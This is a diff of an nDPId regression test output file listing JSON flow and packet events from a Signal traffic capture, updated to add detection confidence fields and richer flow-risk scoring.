 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051245838,"flow_last_seen":1569051245838,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1569051245838,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00840{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569051245838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1569051245838,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKS8AAP8RkXYAAAAA\/\/\/\/\/wBEAEMBNJxAAQEGACG6jqoAAQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
-00697{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051245838,"flow_last_seen":1569051245838,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1569051245838,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
+00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051245838,"flow_last_seen":1569051245838,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1569051245838,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569051247593,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1569051247593,"pkt":"xiwDYGpkxGGLNYKpCABFAABHd8wAAP8RvnbAqAIRwKgCAe15ADUAM\/YJyvgBAAABAAAAAAAABGU2NzMFZHNjZTkKYWthbWFpZWRnZQNuZXQAAAEAAQ=="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247594,"flow_last_seen":1569051247594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569051247594,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569051247594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569051247594,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrcBKAbtArcPUAAAAALAC\/\/8kVgAAAgQFtAEDAwYBAQgKKFVNgQAAAAAEAgAA"}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247599,"flow_last_seen":1569051247599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569051247599,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -16,31 +16,31 @@
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247603,"flow_last_seen":1569051247603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569051247603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569051247603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569051247603,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd69Abtt2McPAAAAALAC\/\/\/RCgAAAgQFtAEDAwcBAQgKKFVR8gAAAAAEAgAA"}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569051247630,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1569051247630,"pkt":"xGGLNYKpxiwDYGpkCABFAABXR+wAAEARrUfAqAIBwKgCEQA17XkAQwp5yviBgAABAAEAAAAABGU2NzMFZHNjZTkKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAA8ABBc5GBA="}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569051247630,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.57.24.16"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569051247630,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.57.24.16"}}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569051247643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051247643,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73rrg+UqLaJ6n1qAScSCOEgAAAgQFrAQCCAqWTinBKFVR7gEDAwc="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1569051247645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051247645,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN66AbtonqfW4PlKjIAQBAspvwAAAQEICihVUhuWTinB"}
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247599,"flow_last_seen":1569051247645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051247645,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247599,"flow_last_seen":1569051247690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051247690,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247599,"flow_last_seen":1569051247645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051247645,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247599,"flow_last_seen":1569051247690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051247690,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569051247704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051247704,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG7wEr7fyfqQK3D1aASaN\/uCAAAAgQFrAQCCApkFVboKFVNgQEDAwg="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569051247706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051247706,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrcBKAbtArcPV+38n64AQCBZ9JQAAAQEICihVTfNkFVbo"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247594,"flow_last_seen":1569051247706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1569051247706,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247594,"flow_last_seen":1569051247706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1569051247706,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569051247709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051247709,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73rtLEL7asq23cqASaN9\/CQAAAgQFrAQCCApkFVbqKFVR7wEDAwg="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569051247711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051247711,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd67AbuyrbdySxC+24AQBAsSOAAAAQEICihVUlpkFVbq"}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247600,"flow_last_seen":1569051247711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051247711,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247600,"flow_last_seen":1569051247711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051247711,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73r1n96jrbdjHEKASaN+tQgAAAgQFrAQCCApkFVbrKFVR8gEDAwg="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G9nMi4fCtwKgCEQG73rwJHv1\/xsFthKASaN+4LQAAAgQFrAQCCApkFVbrKFVR8AEDAwg="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd69Abtt2McQZ\/eo7IAQBAtAbwAAAQEICihVUl9kFVbr"}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247603,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247603,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd68AbvGwW2ECR79gIAQBAtLWAAAAQEICihVUl9kFVbr"}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247601,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
